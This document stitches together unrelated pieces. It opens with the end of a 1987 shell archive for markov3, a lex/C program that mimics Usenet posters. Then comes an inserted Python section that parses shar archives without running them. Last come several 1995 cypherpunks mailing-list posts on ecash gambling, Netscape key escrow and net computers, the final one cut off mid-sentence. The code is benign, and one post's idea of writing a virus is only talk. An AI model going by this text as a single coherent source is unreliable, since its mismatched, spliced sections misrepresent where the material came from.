XThe code that uses "rand" should now be portable (the patches posted
Xto the net to fix this problem were wrong, they break the code on
Xsome machines in order to fix it on others.  I stole some code from
X"hack" to do things right.  If hack works for you, this should).
X
Xmarkov3 now understands "notes" cruft (thanks to Rich Salz).
X
XBecause of the 50% rule in news 2.11, people often use some other
Xcharacter than ">" for inclusions.  markov3 assumes that lines
Xbeginning with any of 
X
X	> < ) | # } ]
X
Xare inclusions (without this rule, funny-looking output results if
Xanyone uses non-standard "quoting").
X
XThe random number generator is initialized using the time, if neither
Xthe -s flag nor the new -x flag is given.
X
XThis will be the last complete posting; a "patchlevel" file is included
Xand I will send out patches if there are further bugs or improvements.
X
XHere's the original README.
X---------------------------------------------------------------------------
XI created a bit of a stir with this program in December 1986 when I
Xused an earlier version of it to simulate a certain well-known net
Xpersonality (Hi Laura!).  It digests Usenet articles and spits out
Xother articles with similar characteristics.  You need lex to run it,
Xbut otherwise it should run on any Unix I know of.  
X
XI had several requests for the program but didn't consider it
X"ready".  It's as ready as it will ever be now.
X
XThe program uses getopt(3).  There are several public-domain versions
Xavailable for Berkeley systems from the mod.sources archives.  Since
Xit's small, I've included Henry Spencer's version, but you'll have
Xto change the Makefile to use it.
X
XFor best results, feed it at least ten articles by the same person
Xor on the same subject.  If there are fewer articles the output
Xresembles the original too much; if there is too much variety in
Xthe articles the output is more incoherent than it otherwise is.
X
XThe program requires lots of memory if it is given lots of input;
Xthe small-model people will have problems.
X
XPlease don't post the output to the net (though I'd be happy to
Xsee some of the more interesting results).
X
XSend comments, suggestions for improvement, fan mail, and flames
Xto me: {sun,hplabs,ames,ihnp4}!oliveb!epimass!jbuck.
END_OF_FILE
  if test 2400 -ne `wc -c <'README'`; then
    echo shar: \"'README'\" unpacked with wrong size!
  fi
  # end of 'README'
fi
if test -f 'markov3.6' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'markov3.6'\"
else
  echo shar: Extracting \"'markov3.6'\" \(2503 characters\)
  sed "s/^X//" >'markov3.6' <<'END_OF_FILE'
X.\" markov3
X.\" @(#)markov3.6	1.1 3/6/87 epimass!jbuck
X.TH MARKOV3 6 "3/6/87"
X.UC 4
X.SH NAME
Xmarkov3 \- Digest and spit out quasi-random Usenet articles
X.SH SYNOPSIS
X.B markov3
X[
X.B \-pv
X] [
X.B \-n
X.I n_articles
X] [
X.B \-d
X.I dumpfile
X] [
X.B \-s
X.I seed
X] [
X.B \-x
X]
Xfiles
X.SH DESCRIPTION
X.PP
X.I Markov3
Xdigests Usenet articles and builds an internal data structure that
Xmodels the articles as if they came from a random process, where
Xeach word is determined by the previous two.  It then emits a series
Xof articles on the standard output that have the same distribution
Xof words, word pairs, and word triplets as do the input files.
XThe name
X.I markov3
Xcomes from the fact that this structure is called a Markov chain,
Xand that the statistics for word triplets are modeled.
XHere, a "word" is a sequence of printable characters surrounded by
Xwhitespace.  Paragraph breaks (blank lines) are also treated as a
X"word".  Paragraphs of included text are treated as single "words"
Xand printed as "> ...".
X.PP
XBy default, the program expects to be fed Usenet articles; it strips
Xoff headers, included text, and signatures (or at least it tries).
XThe
X.B \-p
X(plain) option disables the header-stripping feature (otherwise
Xeverything is skipped until a blank line is encountered).
X.PP
XBy default, 10 articles, separated by form feeds, are written on the
Xstandard output.  The
X.B \-n
Xoption lets you specify a different number.
X.PP
XThe
X.B \-x
Xoption does not seed the random number generator; this is useful
Xfor simulating people who repeat themselves.
X.PP
XThe
X.B \-d
X(dump) option dumps a representation of the internal data structure
Xbuilt by
X.I markov3
Xon the named file.
X.PP
XFinally, the
X.B \-v
X(verbose)
Xoption prints some statistics on the standard error.
X.SH "CAVEATS"
XThis program allocates lots of memory if given large amounts of input.
XOn virtual memory systems, the paging behavior is atrocious because
Xpointers tend to point every which way, and many pointers are dereferenced
Xfor every word processed.  This could be improved, I'm sure.
X.PP
XPosting articles generated by
X.I markov3
Xto the net may be hazardous to your health.
X.PP
XNot as smart as Mark V. Shaney.
X.SH "PORTABILITY"
XAn effort has been made to make this program as portable as possible;
Xan earlier version was much less portable because of problems with
Xnull pointers and rand(3).  Please let me know if you have further problems.
X.PP
XIf you don't have lex, you'll need to rewrite the lexical analyzer
Xbut most of the program is in C.
END_OF_FILE
  if test 2503 -ne `wc -c <'markov3.6'`; then
    echo shar: \"'markov3.6'\" unpacked with wrong size!
  fi
  # end of 'markov3.6'
fi
if test -f 'markov3.l' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'markov3.l'\"
else
  echo shar: Extracting \"'markov3.l'\" \(11822 characters\)
  sed "s/^X//" >'markov3.l' <<'END_OF_FILE'
X%{
X/*
X * Copyright (c) 1986, 1987 by Joe Buck
X *
X * Permission is granted to use, redistribute, or modify this program,
X * as long as you don't pretend you wrote it.  Send improvements or
X * bug reports to {ihnp4,hplabs,ames,sun}!oliveb!epimass!jbuck.
X *
X * The program generates simulated Usenet articles, given Usenet articles
X * as input.
X *
X * This program constructs a table of frequencies for a token appearing,
X * given the two preceding tokens.  A "token" is a sequence of non-blank
X * characters.  An entirely blank line is also treated as a token, as is
X * the beginning and end of an article.
X *
X * The program is designed to process news articles, rejecting text from
X * the header, signature, and included text, together with cruft inserted
X * by rn and notes.  A paragraph of included text is treated like a token.
X *
X * After the table is built (and it can be big), articles are generated
X * on the standard output.
X */
X#ifndef lint
Xstatic char *sccs_id = "@(#)markov3.l	1.1 3/6/87 epimass!jbuck";
X#endif
X#include <sys/types.h>		/* for time_t */
Xint in_included_text = 0;
X#ifdef yywrap
X#undef yywrap
X#endif
X%}
X%Start HDR BODY SIG
X%%
X<HDR>^[^ \t]+:.*\n	;	/* Header line, e.g. "From: foo@bar.UUCP" */
X<HDR>^[ \t]+[^ \t].*\n	;	/* Continuation of header line */
X<HDR>^[ \t]*$		BEGIN BODY;
X<BODY>^"-- "$		BEGIN SIG;
X<BODY>^[><)|#}].*\n	{ /* 50% rule gets people to change ">"
X			     to other characters; this gets most of them */
X			  if (!in_included_text) {
X    			      in_included_text = 1;
X			      process_token ("\n> ...\n\n");
X			  }
X			}
X<BODY>"]".*\n		{ /* should have been included in the above.  My
X			     lex generates bad C code if I say [[><...]
X			     even though ed(1) says that's a valid regular
X			     expression. */
X			  if (!in_included_text) {
X			      in_included_text = 1;
X			      process_token ("\n> ...\n\n");
X			  }
X			}
X<BODY>^"In article".*\n	;	/* Reject rn crud */
X<BODY>^"/* Written".*"*/"\n	;		/* Also NOTES crud */
X<BODY>^"/* End of text from".*"*/"\n	;		/* NOTES */
X<BODY>^"/* ----------".*"----------*/"\n	;		/* NOTES */
X<BODY>[ \t]+		;	/* Skip white space */
X<BODY>\n[ \t\n]*\n	{ process_token ("\n"); /* Paragraph break */}
X<BODY>^\..*		;	/* Ignore format directives. */
X<BODY>[^ \t\n]+		{ in_included_text = 0; process_token (yytext); }
X<HDR>.			;	/* Eat anything that escaped */
X<HDR>\n			;
X<BODY>\n		;
X<SIG>.			;
X<SIG>\n			;
X%%
Xextern int optind;
Xextern char *optarg;
X
X/*
X * hashtab is a hash table storing all the tokens we encounter.
X */
Xstruct htentry {
X    char *htext;
X    struct htentry *hlink;
X};
X
X#define HSIZE 3557		/* Should be prime */
X#define Fprintf (void)fprintf
X#define Printf (void)printf
X
Xstruct htentry hashtab[HSIZE];
X
X/*
X * node and succnode are portions of the big structure we're going to build.
X * node represents something like ("was", "a") in a binary tree.
X * a linked list of succnodes contain tokens that may follow ("was", "a")
X */
Xstruct node {
X    char *text;
X    char *text2;
X    int ocount;
X    struct node *lc, *rc;
X    struct succnode *succ;
X};
X
Xstruct succnode {
X    struct node *scnod;
X    int    count;
X    struct succnode *link;
X};
X
X
Xstruct node *prev_code = NULL;
Xchar *prev_token = NULL, **Argv;
Xint init_state = HDR;
Xint verbose = 0;
Xstruct node *root = NULL, *tknptr;
Xstruct succnode *start = NULL;
Xint n_pairs = 0, n_tokens = 0, n_files = 0, n_total = 0;
X
Xstruct node *insert_token();
Xchar *savetoken();
X
Xprocess_token (txt)
Xchar *txt;
X{
X     struct node *code;
X     char *token = savetoken (txt);
X/* We have a new token.  Say the previous two tokens were "one" "way"
X * and the current token is "to".  Then prev_code points to a node
X * for ("one", "way") and token is "to".  This function adds ("way", "to") as a
X * successor to ("one","way") and makes prev_code point to ("way","to").
X */
X     code = insert_token (prev_token, token);
X     insert_pair (prev_code, code);
X     prev_code = code;
X     prev_token = token;
X     return;
X}
X
X/*
X * here it is, the main function.
X */
Xmain (argc, argv)
Xint argc;
Xchar  **argv;
X{
X    int     i, c, n_articles = 10, sflag = 0;
X    char *dumpfile = NULL;
X    extern int  optind;
X    extern char *optarg;
X
X    while ((c = getopt (argc, argv, "pxvn:d:s:")) != EOF) {
X	switch (c) {
X	    case 'v':
X		verbose = 1;
X		break;
X	    case 'p':		/* Input is plain text, not Usenet stuff */
X		init_state = BODY;
X		break;
X	    case 'n': 		/* # articles to generate */
X		n_articles = atoi (optarg);
X		break;
X	    case 'd':		/* where to dump the data structure */
X		dumpfile = optarg;
X		break;
X	    case 's':		/* Set the seed for rand; fall through */
X		srand (atoi (optarg));
X	    case 'x':		/* set flag to prevent srand */
X		sflag++;
X		break;
X	    default:
X		Fprintf (stderr,
X		 "Usage: markov3 [-pvx] [-s seed] [-n n_art] [-d dump] files\n");
X		exit (1);
X	}
X    }
X    BEGIN init_state;		/* initial state of lexical analyzer */
X    if (!sflag)			/* set random number generator */
X	srand ((int)time ((time_t *)0));
X/* Note: if optind == argc, there are no file arguments.  yyin is left
X * initialized to stdin.
X */
X    if (optind < argc) {
X/* yyin is lex input stream.  Point to first file. */
X	if ((yyin = fopen (argv[optind], "r")) == NULL) {
X	    perror (argv[optind]);
X	    exit (1);
X	}
X	optind++;		/* skip to next file */
X    }
X    Argv = argv;		/* make it global so yywrap can access it */
X    n_files = 1;
X/* yylex puts all the input files through the lexical analyzer and builds
X * the database.
X */
X    (void) yylex ();
X    if (dumpfile)
X	dump_database (dumpfile);
X    if (verbose)
X	Fprintf (stderr,
X	 "Total of %d tokens (%d different), %d different pairs, %d files\n",
X		n_total, n_tokens, n_pairs, n_files);
X/* Generate the articles, separated by form feeds */
X    for (i = 0; i < n_articles; i++) {
X	if (i > 0) output_word ("\n\f\n");
X	generate_article ();
X    }
X    return 0;
X}
X
X/*
X * Lex calls this when EOF is reached.  It opens the next file if there
X * is one.  Lex interprets a return value of 1 to mean "all done" and 0
X * to mean "keep going".
X */
Xyywrap () {
X    (void) fclose (yyin);
X    insert_pair (prev_code, (struct node *)0);
X    prev_code = NULL;
X    if (Argv[optind] == NULL) return 1;
X    else if ((yyin = fopen (Argv[optind], "r")) == NULL) {
X	perror (Argv[optind]);
X	exit (1);
X    }
X    optind++;
X    in_included_text = 0;
X    if (verbose && n_files % 10 == 0)
X	Fprintf (stderr, "%d files\n", n_files);
X    n_files++;
X    BEGIN init_state;
X    return 0;
X}
X
X/*
X * This function saves a token in the hash table (if it isn't there
X * already) and returns a pointer to the stored copy.
X */
Xchar *
Xsavetoken (txt)
Xchar *txt;
X{
X    int h;
X    char *p;
X    struct htentry *hp;
X
X    n_total++;
X    for (p = txt, h = 0; *p; h += *p++);
X    hp = hashtab + (h % HSIZE);
X    while (hp->hlink) {
X	if (strcmp (hp->htext, txt) == 0) {
X	    return hp->htext;
X	}
X	hp = hp->hlink;
X    }
X/* OK, it's a new token.  Make hp->hlink point to a new,
X * null block and make hp->htext point to the text.
X */
X    hp->hlink = (struct htentry *) malloc (sizeof *hp);
X    hp->htext = malloc ((unsigned)(strlen (txt) + 1));
X    (void) strcpy (hp->htext, txt);
X    hp->hlink->hlink = NULL;
X    hp->hlink->htext = NULL;
X    n_tokens++;
X    return hp->htext;
X}
X
X/*
X * This recursive function inserts a token pair into the tree.
X */
Xstruct node *
Xinsert_in_tree (p, txt, txt2)
Xstruct node *p;
Xchar *txt, *txt2;
X{
X    int cmp;
X    if (p == NULL) {
X/* Create a new node. */
X	p = (struct node *) malloc (sizeof *p);
X	p->text = txt;
X	p->text2 = txt2;
X	p->lc = p->rc = NULL;
X	p->succ = NULL;
X	p->ocount = 1;
X	tknptr = p;
X	n_pairs++;
X	if (verbose && n_pairs % 1000 == 0)
X	    Fprintf (stderr, "%d pairs\n", n_pairs);
X	return p;
X    }
X    cmp = my_strcmp (p->text, txt);
X    if (cmp == 0) cmp = my_strcmp (p->text2, txt2);
X    if (cmp == 0) {
X/* It's a match.  Increment the count. */
X        tknptr = p;
X	p->ocount += 1;
X    }
X/* Look in the subtrees. */
X    else if (cmp < 0) p->lc = insert_in_tree (p->lc, txt, txt2);
X    else p->rc = insert_in_tree (p->rc, txt, txt2);
X    return p;
X}
X
X/*
X * This just calls insert_in_tree starting at the root
X */
Xstruct node *
Xinsert_token (txt, txt2)
Xchar *txt,*txt2;
X{
X    root = insert_in_tree (root, txt, txt2);
X    return tknptr;
X}
X
X/*
X * This function adds a successor.
X */
Xstruct succnode *
Xinsert_in_succ_chain (sp, np)
Xstruct succnode *sp;
Xstruct node *np;
X{
X    if (sp == NULL) {
X	sp = (struct succnode *) malloc (sizeof *sp);
X	sp->scnod = np;
X	sp->count = 1;
X	sp->link = NULL;
X    }
X    else if (sp->scnod == np)
X	sp->count += 1;
X    else sp->link = insert_in_succ_chain (sp->link, np);
X    return sp;
X}
X
X/*
X * This calls insert_in_succ_chain starting at the right place.
X */
Xinsert_pair (p1, p2)
Xstruct node *p1, *p2;
X{
X    if (p1) p1->succ = insert_in_succ_chain (p1->succ, p2);
X    else start = insert_in_succ_chain (start, p2);
X}
X
X/*
X * This function dumps the stored data structure onto a file.
X * Now if only I had a function to read it back in.
X */
Xchar *
Xpr_token (txt)
Xchar *txt;
X{
X    if (txt[0] != '\n')
X	return txt;
X    return txt[1] ? "<INCL>" : "<LF>";
X}
X
Xtreedump (tree, fp)
Xstruct node *tree;
XFILE *fp;
X{
X    if (tree) {
X	treedump (tree->rc, fp);
X	Fprintf (fp, "( %s %s ) %d", pr_token (tree->text),
X			pr_token (tree->text2), tree->ocount);
X	chaindump (tree->succ, fp);
X	treedump (tree->lc, fp);
X    }
X}
X
X/*
X * Subroutine of treedump; it does one row.
X */
Xchaindump (p, fp)
Xstruct succnode *p;
XFILE *fp;
X{
X    char   *text;
X    while (p) {
X	if (p->scnod == NULL)
X	    text = "<EOF>";
X	else text = pr_token (p->scnod->text2);
X	Fprintf (fp, " %s %d", text, p->count);
X	p = p->link;
X    }
X    putc ('\n', fp);
X}
X
X/*
X * This routine generates the dump file (-d option)
X */
Xdump_database (file)
Xchar *file;
X{
X    FILE *fp = fopen (file, "w");
X    if (fp == NULL) {
X	Fprintf (stderr, "markov: can't open ");
X	perror (file);
X	exit (1);
X    }
X    Fprintf (fp, "START:");
X    chaindump (start, fp);
X    treedump (root, fp);
X}
X
X/* roll (n) generates a uniformly distributed rv between 0 and n-1.
X * This code is stolen from "hack" and should be portable.  If you
X * change this, remember that different systems have rand functions
X * with different ranges, and the bottom bits are often no good.
X */
X#define roll(n) ((rand() >> 3) % n)
X
X/*
X * This function generates an article by traversing the
X * structure we've built.
X */
Xgenerate_article () {
X    struct succnode *p = start;
X    int ncounts = n_files;
X    int n, accum;
X    char *tp;
X
X    while (1) {
X/* Roll the dice to find out the next token.  The code below selects the
X * next token, and the new state, with a probability corresponding to the
X * frequency in the input.
X */
X	n = roll (ncounts);
X	accum = p->count;
X	while (accum <= n && p->link) {
X	    p = p->link;
X	    accum += p->count;
X	}
X	if (p->scnod == NULL)
X	    break;
X	tp = p->scnod->text2;
X/* Check for "end of story" */
X	if (tp == NULL)
X	    break;
X	output_word (tp);
X	ncounts = p->scnod->ocount;
X	p = p->scnod->succ;
X    }
X    output_word ("\n");	/* This will flush the buffer as well. */
X    return;
X}
X
X/*
X * This version handles null strings *
X */
Xmy_strcmp (a, b)
Xregister char *a, *b;
X{
X    if (a == NULL) return b ? -1 : 0;
X    if (b == NULL) return 1;
X    return strcmp (a, b);
X}
X
X#define LEN 75
Xoutput_word (word)
Xchar *word;
X{
X    static char line[LEN+1];
X    static int room = LEN;
X    int l;
X
X    if (word == NULL) return;
X    l = strlen (word);
X/* If word won't fit, or starts with \n, dump the current line */
X    if ((l >= room || word[0] == '\n') && line[0]) {
X	Printf ("%s\n", line);
X	line[0] = 0;
X	room = LEN;
X    }
X/* If word won't fit in the buffer or starts with \n, print it now */
X    if (l >= LEN)
X	Printf ("%s\n", word);
X    else if (word[0] == '\n')
X	Printf ("%s", word);
X/* Otherwise fill it in */
X    else {
X	(void)strcat (line, word);
X	(void)strcat (line, " ");
X	room -= (l + 1);
X    }
X    return;
X}
END_OF_FILE
  if test 11822 -ne `wc -c <'markov3.l'`; then
    echo shar: \"'markov3.l'\" unpacked with wrong size!
  fi
  # end of 'markov3.l'
fi
echo shar: End of archive.
exit 0
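
The archive above is meant to be fed to `sh`, which runs every line of the mail as a command. As an added example (not part of the original message or of the shar tool), the following Python reads the same archive layout as data without executing it, strips the `X` prefixes, and checks each member against the byte count in the archive's own `wc -c` test; the function names, status strings and the sample archive are constructed for illustration.

```python
import os
import re

# The extraction command used by this shar dialect, e.g.
#   sed "s/^X//" >'Makefile' <<'END_OF_FILE'
EXTRACT_RE = re.compile(r"""^\s*sed "s/\^X//" >'([^']+)' <<'([^']+)'\s*$""")
# The size check that follows each member, e.g.
#   if test 53 -ne `wc -c <'Makefile'`; then
SIZE_RE = re.compile(r"""^\s*if test (\d+) -ne `wc -c <'([^']+)'`; then\s*$""")


def is_safe_name(name):
    """Accept only a plain file name: no directories, no '..', no leading '-'."""
    if not name or name in (".", "..") or name.startswith("-"):
        return False
    return "/" not in name and "\\" not in name


def parse_shar(text):
    """Return one dict per archive member; nothing in the archive is executed."""
    lines = text.split("\n")
    members, declared = [], {}
    i = 0
    while i < len(lines):
        m = EXTRACT_RE.match(lines[i])
        if m:
            name, terminator = m.groups()
            body = []
            i += 1
            # Quoted here-document: body runs until a line equal to the terminator.
            while i < len(lines) and lines[i] != terminator:
                line = lines[i]
                # sed "s/^X//" removes exactly one leading X, if present.
                body.append(line[1:] if line.startswith("X") else line)
                i += 1
            members.append({
                "name": name,
                "data": "".join(l + "\n" for l in body),
                "truncated": i >= len(lines),  # terminator never seen
            })
        else:
            s = SIZE_RE.match(lines[i])
            if s:
                declared[s.group(2)] = int(s.group(1))
        i += 1

    for member in members:
        member["declared"] = declared.get(member["name"])
        # Assumption: the archive is ASCII/UTF-8, so bytes match what wc -c counts.
        member["actual"] = len(member["data"].encode("utf-8"))
        if not is_safe_name(member["name"]):
            member["status"] = "unsafe-name"
        elif member["truncated"]:
            member["status"] = "truncated"
        elif member["declared"] is None:
            member["status"] = "no-size-check"
        elif member["declared"] != member["actual"]:
            member["status"] = "size-mismatch"
        else:
            member["status"] = "ok"
    return members


def extract_verified(text, destdir):
    """Write only members whose name is safe and whose size matches."""
    written = []
    for member in parse_shar(text):
        if member["status"] != "ok":
            continue
        path = os.path.join(destdir, member["name"])
        # Mode "x" refuses to overwrite, like the archive's own clobber test.
        with open(path, "x", encoding="utf-8", newline="\n") as fh:
            fh.write(member["data"])
        written.append(member["name"])
    return written


# Constructed sample in the dialect shown above. PATCHLEVEL mirrors the
# archive's own member; the other two members are made up to show failures.
SAMPLE_SHAR = """#! /bin/sh
if test -f 'PATCHLEVEL' -a "${1}" != "-c" ; then
  echo shar: Will not clobber existing file
else
  sed "s/^X//" >'PATCHLEVEL' <<'END_OF_FILE'
X1
END_OF_FILE
  if test 2 -ne `wc -c <'PATCHLEVEL'`; then
    echo shar: unpacked with wrong size!
  fi
fi
  sed "s/^X//" >'notes.txt' <<'END_OF_FILE'
XXX marks the spot
Xsecond line
END_OF_FILE
  if test 99 -ne `wc -c <'notes.txt'`; then
  fi
  sed "s/^X//" >'../outside.txt' <<'END_OF_FILE'
Xdata
END_OF_FILE
  if test 5 -ne `wc -c <'../outside.txt'`; then
  fi
exit 0
"""

if __name__ == "__main__":
    for member in parse_shar(SAMPLE_SHAR):
        print(member["name"], member["declared"], member["actual"], member["status"])
```

The size check only detects truncation or mangling in transit; it says nothing about who produced the archive.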




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 2 Dec 1995 19:23:16 +0800
To: loki@obscura.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <199512010807.AAA12540@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 AM 12/1/95 +0600, Ed Carp wrote:
>The only problem with this approach is that this will bite other 
>browsers that have started supporting the so-called "Netscape 
>extensions".  More than one person has coded the Netscape stuff into 
>their pages because it gives the author more flexibility than the 
>standard 1.0/2.0 standards.  And there aren't many browsers out there 
>yet that support 3.0.

http://www.netmanage.com/  have a free browser that supposedly supports
3.0 -- I have not tested it yet, though I downloaded it a short while
ago.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Thu, 30 Nov 1995 07:36:41 +0800
To: sameer <sameer@c2.org>
Subject: Re: ecash casino
In-Reply-To: <199511291640.IAA28114@infinity.c2.org>
Message-ID: <9511292318.AA27417@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


sameer@c2.org writes:
 > 	Any enterprising cypherpunks in gambling-friendly
 > jurisdictions interested? I figure it would make ecash take off.. and
 > you'd get rich.
Good idea, I'd gladly provide (read sell ;-) know-how :-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

DST Kaser Sose Panama Castro Khaddafi Ortega arrangements




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 13:43:08 +0800
To: jlasser@rwd.goucher.edu
Subject: Re: The future will be easy to use
Message-ID: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jlasser@rwd.goucher.edu"  "Jon Lasser" 29-NOV-1995 16:23:00.41

Not if you're encrypting a Credit Card transaction to ship physical 
goods.  In that case, I'm going to certainly want to link a key ID to a 
physical body (or at least address) if I'm the seller, so as to limit 
liability as best I can.

While this might not ultimately be important, early adopters of crypto on 
the net seem in general to be financially interested with an eye to limiting 
liability. They want linked keys.

There's a public-relations aspect to crypto which most systems not 
linking name -> key id fail.  This is the step necessary to get it out 
the door.

Unfortunately, it also appears counter to CP philosophy.

However, if you have optional linking of ID and name, shippers will only 
ship to keys with such attributes. Because just ID and address, it could 
be a "hit and run" type attack shipped to a safe maildrop.
---------------------------------
	If the transaction is via a Credit Card, it's the card issuer's
liability (and responsibility to determine creditworthiness), unless I'm badly
mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge
physical dollars when ecash is presented to them. What's the risk in either
case?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 13:44:58 +0800
To: tcmay@got.net
Subject: Re: ecash lottery (Was: ecash casino)
Message-ID: <01HY8GTQ0EGY8WYXCN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 29-NOV-1995 23:16:11.12

Personally, I have long had great _hopes_ for using crypto for
non-sanctioned gambling, but I'm pretty skeptical that many people will do
it. For one thing, anyone knowledgeable enough to be comfortable with the
cryptography knows that gambling when a house cut exists is a lose. (And
gambling with no house cut is, at best, a wash.)
-----------------------
	How about gambling on something other than random numbers? Idea Futures
are one instance, as is sports gambling for those interested in that sort of
thing.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Sat, 2 Dec 1995 09:25:56 +0800
To: cypherpunks@toad.com
Subject: META: Lycos & Searchable archives
Message-ID: <199511300556.AAA15009@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Someone has expressed concern to me that the cypherpunks archives are
searchable via Lycos.  Said person doesn't mind having the archives
searchable to the smaller audience of people who go to the we-site,
but is unhappy about net-wide searches turning up cypherpunks articles.

Can we try to find a consensus on this?  My initial inclination was to
shrug the concern off (properties of information, etc, as well as c'punks
being a more-or-less anarchy and the express desire for some sort of
searching mechanism for c'punks), but I thought I'd double check as I've
been mostly out of touch for the better part of a year.
- --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBML1HiCoZzwIn1bdtAQEtjgF/d7GBzgELk41OE+/pZxnZkzn+qYLRHmTn
8mbScBdkko83n4sxGjwFRQJyN5IlPCJQ
=nFDi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 30 Nov 1995 14:01:04 +0800
To: cypherpunks@toad.com
Subject: Esoteric Lotteries Re: Quit it!
In-Reply-To: <199511300520.GAA07040@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9511300050.A20502-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


One might be tempted to use the number of posts claiming to be from Alice 
d'Anonymous on any particular day as a fair random number basis for some
gambling scheme.

 Good going Alices
					Not another one of those...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Fri, 1 Dec 1995 09:11:10 +0800
To: sameer <sameer@c2.org>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199511300644.WAA02011@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951130010850.18600A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Nov 1995, sameer wrote:

> http://www.cnet.com/Central/News/govt.html
> 
> 	Bad. Very Bad. And I was almost starting to like Netscape.

Ahh well there goes my respect for Netscape too. *sigh*
Ahh well guess someone will just have to write a virus
to say enhance all escrow equipped versions of Netscape that come out.
Of course I don't have to point out to Netscape we won't buy
any escrowed products from them. Hmmm Open Market is starting to
look better.

> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Thu, 30 Nov 1995 21:22:38 +0800
To: tcmay@got.net
Subject: Re: Diskless "Eunuchs" Machines Likely to Fail
In-Reply-To: <ace0059603021004f459@[205.199.118.202]>
Message-ID: <gfNvw4B4GX4D088yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


In article <ace0059603021004f459@[205.199.118.202]>, Timothy C. May wrote:


>A couple of years ago "the computer for the rest of us" was said to be a
>pen-based Newton-type machine, now it is said to be a diskless,
>memory-limited "Eunuchs" machine.



Beyond the specifics of Oracle's naive vision, I think what is
doomed (I hope) to fail is the obsolescent paradigm that it reflects.
It seems that many corporate types are fixated on the idea of tractable
and predictable consumers.  The need to raise the population and
broaden the demographic of potential customers for the coming
Information SuperMarketway by minimizing the entry cost is obvious. The
approach to understanding the actual dynamics of why people are and
will increasingly come into this space and what they will want to do
once they get there is deficient for many.  Some are intimidated by the
unpredictably evolving emergent properties of consumer (well, still
mostly window shopper) behavior in this new territory, and are looking
for the comforting familiarity that their marketing consultants and
financial planners could provide them in the old brickspace way of doing
business.  Others are puzzled, or are overtly threatened by the idea of
potential consumers who are also content producers.

I think that the limitations of interactive set-top boxes and
lobotomized net terminals appeal to this mindset.  There's less
likelihood of troubling novel behavior and initiative.  The consumer's
options are constrained and thereby the details of marketing are more
manageable.

These prospective cyber-consumers who are increasingly in the
frustrating habit of producing and sharing content amongst themselves
(usually for free, no less!), thereby distracting each other from the
content providers and virtual storefronts they should be flocking to,
are a potent wild card in the game that many cannot deal with, and some
wish they could deal out of the deck.  This nascent internet phenomenon
is the economic aspect of the broader disintegration and decline of the
means to control mass opinion and behavior that many in the current
ruling class find threatening as well.  The corporations that can get a
clue, and learn how to go with the flow of this changing environment, can
still prosper. The dinosaurs who can't, or won't adapt, will free up
valuable niches for the independent upstarts who not only can ride the
waves of change, but who thrive on them and even strive to make them
bigger.

Oracle's vision of the low-cost, diskless "Eunuchs" net station
may materialize on the shelves of Walmart, and Circuit City, etc...
But it will not take long for those who buy them to realize that
they are in a subclass on the internet (That is, if they are really
given the freedom to explore the net at large) and to feel frustrated
with their limited options to create and express themselves.  Those
too dim-witted to notice or care might as well have remained as bovine
Cable Shopping Network viewers ensconced in their TV room lounge chairs.

I do think that there is a substantial and viable market for entry level
notebook form factor (running off a cheap wall socket DC converter with
battery optional) 'Net' PC's well below $1000 in the not-too-distant
future.  Processor and hard drive costs are certainly dropping fast
